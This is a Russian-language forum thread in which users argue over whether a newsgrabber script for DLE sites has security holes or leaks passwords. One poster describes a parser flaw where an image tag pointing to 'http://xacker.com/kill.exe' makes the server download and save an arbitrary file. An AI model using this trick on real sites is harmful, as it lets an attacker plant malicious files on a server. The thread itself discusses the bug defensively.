- Статус
ukrmedshpora
Постоялец
- Регистрация
- 11 Апр 2007
- Сообщения
- 145
- Реакции
- 42
а он случайно в базу не пишеццо?
а сам скрипт пассов не шлет никуда?
а сам скрипт пассов не шлет никуда?
Z
ZloySoft
Прохожие
- Автор темы
- #24
??? Ты серьезно?.. ну раз сказал А, то говори и Б.. где эти места, как их можно обезвредить?..
sergeus
Мастер
- Регистрация
- 15 Апр 2006
- Сообщения
- 185
- Реакции
- 34
??? Ты серьезно?.. ну раз сказал А, то говори и Б.. где эти места, как их можно обезвредить?..
Ну ты сказал... Думаешь мне больше нечего делать, как обезвреживать чужие скрипты и латать чужие дыры?
В своей версии интеграции NG и DLE я все залатал, но отдельно NG в таком варианте работать не будет.
Z
ZloySoft
Прохожие
- Автор темы
- #26
фантазируешь ты наверное.. что-то я не слышал ни одного случая, когда разработчик грохнул все одной коммандой.. хотя нуленых ньюсграбберов в десятки (если не в сотни) раз больше по сети гуляет, чем лицензионных..
..хоть бы где кто обмолвился, что у него по непонятной причине работать перестало.. или все файлы внезапно оказались стертыми.. да хотя бы даже на этом форуме..
..может и есть дырочки.. но по незнанию.. и сам афффтар об них не догадывается?
DOLARiON
Гуру форума
- Регистрация
- 4 Сен 2006
- Сообщения
- 191
- Реакции
- 65
походу и вправду... фантазер
)просматривал я скрипты 100 раз... много чего было в них добавлено, че-то убрано... но вот откровенных "дыр" замечено небыло
кстати, юзаю NG PRO v.1.0.060911
sergeus
Мастер
- Регистрация
- 15 Апр 2006
- Сообщения
- 185
- Реакции
- 34
походу и вправду... фантазер
просматривал я скрипты 100 раз... много чего было в них добавлено, че-то убрано... но вот откровенных "дыр" замечено небыло
кстати, юзаю NG PRO v.1.0.060911
Я рад, что Вы все такие грамотные, честно слово...
Теперь смотрим сюда и задаемся вопросом где в коде проверка на парсинг именно картинок? Парсер пасит строку <img scr=" вот все что тут он парсит". И если еще стоит сохранение картинок, то все что там будет указанно будет сохранено. <img scr="_http://xacker.com/kill.exe" и что вы думаете произойдет?
Больше ни на какие вопросы связанные с данной темой отвечать не буду. Все делается, все лечится.
Признаю свою вину. Виноват. Обхаял суперпарсер. Однозначно больше ничего не буду о нем писать.
Всем приношу извинения, кого затронул.
Z
ZloySoft
Прохожие
- Автор темы
- #29
sergeus молодца.. один баг мы из тебя вытянули.. осталось еще шесть 
.. так об чем это я?.. ах, да.. так вот.. нет там больш дыр.. одну дырочку ты нашел, а остальные придумал.. и можешь ничего не говорить.. все равно мы тебе не поверим..
.. так об чем это я?.. ах, да.. так вот.. нет там больш дыр.. одну дырочку ты нашел, а остальные придумал.. и можешь ничего не говорить.. все равно мы тебе не поверим..
sergeus
Мастер
- Регистрация
- 15 Апр 2006
- Сообщения
- 185
- Реакции
- 34
sergeus молодца.. один баг мы из тебя вытянули.. осталось еще шесть
.. так об чем это я?.. ах, да.. так вот.. нет там больш дыр.. одну дырочку ты нашел, а остальные придумал.. и можешь ничего не говорить.. все равно мы тебе не поверим..
Вот и чудненько! А я, как и обещал больше ничего об этом писать не буду
Всем удачи и лёгкого парса.
- Статус